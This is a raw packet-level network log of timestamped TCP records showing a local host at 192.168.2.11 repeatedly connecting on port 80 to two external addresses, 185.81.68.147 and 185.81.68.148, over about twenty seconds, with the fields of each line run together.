                                                                                                                                                                                                Dec 13, 2024 08:20:40.847327948 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:40.925091982 CET8050056185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.967067003 CET8050048185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.967087030 CET8050058185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:40.967138052 CET5004880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:40.967222929 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:40.973630905 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.093467951 CET8050058185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.373684883 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.373857975 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.374001026 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.375049114 CET5005380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.481267929 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.494729996 CET8050053185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.601041079 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.601174116 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.601263046 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.721005917 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:41.721060991 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:41.840858936 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:42.159787893 CET8050056185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:42.159878016 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:42.330790997 CET8050058185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:42.331341982 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.040301085 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.040493965 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.040553093 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.041712046 CET5006080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.153235912 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.161429882 CET8050060185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.273119926 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.273288012 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.273325920 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.393079996 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.393178940 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.512984991 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.860069036 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:43.860528946 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:43.970613003 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.970797062 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:43.981051922 CET8050068185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.981182098 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:43.981204033 CET8050056185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:43.981266975 CET5005680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:44.001538038 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:44.090478897 CET8050069185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.090562105 CET8050058185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.090562105 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:44.090708971 CET5005880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:44.104129076 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:44.122323036 CET8050068185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.226444960 CET8050069185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.965233088 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.965250015 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:44.965341091 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:44.966675043 CET5006480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:45.074953079 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:45.086652994 CET8050064185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.194730043 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.194870949 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:45.194926977 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:45.314857960 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.314944029 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:45.331218004 CET8050068185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.331315994 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:45.510889053 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.510905981 CET8050069185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:45.511039972 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:46.738065958 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:46.738092899 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:46.738178015 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:46.739494085 CET5007180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:46.840610027 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:46.859684944 CET8050071185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:46.888966084 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:46.889595985 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:46.962245941 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:46.962379932 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:46.962507963 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.009279966 CET8050068185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.009373903 CET5006880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:47.009390116 CET8050073185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.009460926 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:47.025933027 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:47.082237005 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.082308054 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.146325111 CET8050073185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.202286959 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.215924025 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.216209888 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.336550951 CET8050074185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.336714983 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.336831093 CET8050069185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:47.336889029 CET5006980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.356914043 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:47.477296114 CET8050074185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.363445044 CET8050073185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.363593102 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:48.410593033 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.410756111 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.410808086 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.412065983 CET5007280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.528040886 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.532035112 CET8050072185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.647856951 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.648004055 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.648075104 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.678179026 CET8050074185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.678236961 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.767801046 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:48.767887115 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:48.887681961 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.051182032 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:50.051497936 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:50.111821890 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.112091064 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.112200975 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.113161087 CET5007580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.171484947 CET8050076185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.171587944 CET8050073185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.171632051 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:50.171889067 CET5007380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:50.202734947 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:50.227349043 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.232860088 CET8050075185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.322757959 CET8050076185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.347660065 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.347785950 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.347898006 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.467818022 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.467912912 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.545242071 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.549175978 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.587837934 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.665453911 CET8050074185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.665602922 CET5007480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.669044971 CET8050078185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:50.669151068 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.776253939 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:50.896120071 CET8050078185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:51.517194986 CET8050076185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:51.517357111 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:52.001760960 CET8050078185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.001837015 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.009980917 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.010173082 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.010229111 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.011396885 CET5007780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.121866941 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.131109953 CET8050077185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.241709948 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.241946936 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.242399931 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.362199068 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:52.362292051 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:52.482039928 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.126157999 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:53.126485109 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:53.246232986 CET8050080185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.246292114 CET8050076185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.246381998 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:53.246438026 CET5007680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:53.338649988 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:53.458548069 CET8050080185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.697333097 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.697369099 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.697489977 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.698909044 CET5007980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.787928104 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.788304090 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.810581923 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.818639994 CET8050079185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.908113956 CET8050081185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.908190012 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.908349037 CET8050078185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.908397913 CET5007880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.930463076 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:53.932317019 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.933423042 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:53.941865921 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:54.054076910 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:54.054136992 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:54.062266111 CET8050081185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:54.174331903 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:54.595560074 CET8050080185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:54.595634937 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:55.273482084 CET8050081185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.273746967 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.388273954 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.388302088 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.388375044 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.389740944 CET5008280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.496951103 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.509489059 CET8050082185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.616930962 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.617063046 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.617187977 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.737149954 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:55.737279892 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:55.857165098 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:56.574729919 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:56.575124025 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:56.694765091 CET8050080185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:56.694797039 CET8050084185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:56.694912910 CET5008080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:56.694960117 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:56.862883091 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:56.972306013 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:56.972908020 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:56.983350992 CET8050084185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.086164951 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.086209059 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.086319923 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.087752104 CET5008380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.092359066 CET8050081185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.092406034 CET5008180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.092668056 CET8050085185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.092727900 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.119396925 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.200016975 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.207436085 CET8050083185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.239610910 CET8050085185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.320420980 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.320593119 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.320593119 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.440392017 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:57.440711021 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:57.560465097 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:58.032808065 CET8050084185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:58.032871962 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:58.426666021 CET8050085185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:58.426753044 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:58.925791025 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:58.925960064 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:58.926048994 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:58.927340031 CET5008680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.028065920 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.046988010 CET8050086185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.335573912 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.335670948 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.338237047 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.457952023 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.458026886 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.577713966 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.764317989 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:59.764643908 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:59.884491920 CET8050088185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.884581089 CET8050084185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:59.884613037 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:59.884651899 CET5008480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:59.886848927 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:59.992527962 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:59.993122101 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.006624937 CET8050088185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.113039970 CET8050085185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.113111019 CET8050089185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.113145113 CET5008580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.113214016 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.117943048 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.237721920 CET8050089185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.793277025 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.793328047 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:00.793445110 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.794765949 CET5008780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.903280020 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:00.917212009 CET8050087185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.023134947 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.023236036 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:01.023319006 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:01.143152952 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.143287897 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:01.237404108 CET8050088185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.237509966 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:01.263194084 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.470597029 CET8050089185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:01.470716000 CET5008980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:02.666415930 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:02.666435003 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:02.666526079 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:02.680612087 CET5009080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:02.793924093 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:02.800496101 CET8050090185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:02.913866043 CET8050091185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:02.913957119 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:02.914040089 CET5009180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:03.029476881 CET5009280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:03.029541969 CET5008880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:03.033866882 CET8050091185.81.68.147192.168.2.11
